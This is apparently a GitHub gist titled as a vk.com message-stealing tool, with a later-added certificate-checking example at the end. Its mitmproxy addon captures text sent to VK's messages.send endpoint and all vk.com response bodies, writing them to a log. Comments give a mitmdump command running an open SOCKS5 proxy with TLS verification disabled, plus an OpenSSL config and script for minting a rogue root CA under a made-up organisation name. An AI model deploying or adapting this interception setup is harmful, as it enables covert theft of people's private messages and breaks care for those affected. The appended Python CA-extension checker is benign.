@andyollylarkin
Last active October 1, 2024 20:28
mitmproxy vk.com message stealing
from mitmproxy import http


def request(flow: http.HTTPFlow) -> None:
    # Only requests to the VK messages.send endpoint are written to the log
    if "messages.send" in flow.request.pretty_url:
        with open("requests.log", "a") as log_file:
            if flow.request.content:
                if "application/x-www-form-urlencoded" in flow.request.headers.get("Content-Type", ""):
                    if flow.request.urlencoded_form['message']:
                        log_file.write("Данные формы (URL-encoded):\n")
                        log_file.write(f"{flow.request.urlencoded_form['message']}\n")
                elif "multipart/form-data" in flow.request.headers.get("Content-Type", ""):
                    log_file.write("Данные формы (multipart):\n")
                    for key, value in flow.request.multipart_form.items():
                        if key == "message":
                            log_file.write(f"{key}: {value}\n")
                else:
                    log_file.write(f"Тело запроса: {flow.request.text}\n")
                log_file.write("\n")


def response(flow: http.HTTPFlow) -> None:
    # Every response from a vk.com host is appended to the same log file
    if "vk.com" in flow.request.host:
        with open("requests.log", "a") as log_file:
            if flow.response.content:
                log_file.write(f"Тело ответа: {flow.response.text}\n")
                log_file.write("\n")
andyollylarkin commented Sep 30, 2024

Running mitmproxy
This command uses the /tmp directory to look for its own CA certificate, which must be named mitmproxy-ca.pem

mitmdump --listen-host 0.0.0.0  -k --set block_global=false -s /tmp/dumpvk.py  --mode socks5 --set confdir=/tmp

@andyollylarkin

From the documentation

When the certificate is inspected with openssl x509 -noout -text -in ~/.mitmproxy/mitmproxy-ca.pem it must have at least the following X509v3 extensions so that mitmproxy can use it to generate certificates:

X509v3 extensions:
X509v3 Key Usage: critical
Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE

@andyollylarkin

Config for generation

[ ca ]
default_ca = CA_default

[ CA_default ]
default_md        = sha256

[ req ]
prompt = no
default_bits       = 2048
distinguished_name = req_distinguished_name
x509_extensions    = v3_ca

[ req_distinguished_name ]
stateOrProvinceName    = US
localityName           = US
organizationName       = GSSIGN
organizationalUnitName = GSSIGN
commonName             = rootCA
emailAddress           = [email protected]

[ v3_ca ] # section for the extensions
keyUsage = critical, cRLSign, keyCertSign, digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth, clientAuth, emailProtection, timeStamping
basicConstraints = critical, CA:TRUE

Generation script:

echo "Generate root CA key ...";
openssl genpkey -algorithm RSA -out root.key -pkeyopt rsa_keygen_bits:2048;
echo "Generate root CA certificate ...";
openssl req -x509 -new -nodes -key ./root.key -sha256 -days $DAYS -out ./root.crt -passin pass:$2 -config ./root.cnf;
cat ./root.key ./root.crt > ./full.pem;
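The two comments above state what the CA certificate must carry (keyUsage with Certificate Sign, basicConstraints CA:TRUE, both critical) and how it is generated. The following is an added example, not part of the gist, that checks a PEM certificate against exactly those requirements; the function names check_ca_extensions and make_self_signed are mine, and the certificates it builds are constructed test input. The same check is what a defender runs over a trust store to find certificates that are able to issue leaf certificates at all.

```python
# Added example (not part of the gist): check that a PEM certificate has the X509v3
# extensions mitmproxy needs in its CA (Key Usage: Certificate Sign, Basic
# Constraints: CA:TRUE). Requires the "cryptography" package (a mitmproxy dependency).
from datetime import datetime, timedelta, timezone
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

def check_ca_extensions(pem: bytes) -> list:
    """Return the requirements the certificate fails; an empty list means OK."""
    cert = x509.load_pem_x509_certificate(pem)
    problems = []
    try:
        bc = cert.extensions.get_extension_for_class(x509.BasicConstraints)
        if not bc.value.ca:
            problems.append("basicConstraints is CA:FALSE")
        if not bc.critical:
            problems.append("basicConstraints is not marked critical")
    except x509.ExtensionNotFound:
        problems.append("basicConstraints extension missing")
    try:
        ku = cert.extensions.get_extension_for_class(x509.KeyUsage)
        if not ku.value.key_cert_sign:
            problems.append("keyUsage lacks keyCertSign (Certificate Sign)")
        if not ku.critical:
            problems.append("keyUsage is not marked critical")
    except x509.ExtensionNotFound:
        problems.append("keyUsage extension missing")
    return problems

def make_self_signed(is_ca: bool) -> bytes:
    """Constructed test input: a throwaway self-signed cert, CA-shaped or leaf-shaped."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "rootCA" if is_ca else "leaf")])
    now = datetime.now(timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name).issuer_name(name).public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now).not_valid_after(now + timedelta(days=1))
        .add_extension(x509.BasicConstraints(ca=is_ca, path_length=None), critical=True)
        # Key usage mirrors the gist's keyUsage line in the CA case; a leaf gets no keyCertSign
        .add_extension(x509.KeyUsage(
            digital_signature=True, content_commitment=False, key_encipherment=True,
            data_encipherment=False, key_agreement=False, key_cert_sign=is_ca,
            crl_sign=is_ca, encipher_only=False, decipher_only=False), critical=True)
        .sign(key, hashes.SHA256())
    )
    return cert.public_bytes(serialization.Encoding.PEM)
```

To audit a real file, pass the bytes of the PEM (for example the ~/.mitmproxy/mitmproxy-ca.pem mentioned above) to check_ca_extensions; an empty list means mitmproxy will accept it as its CA.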
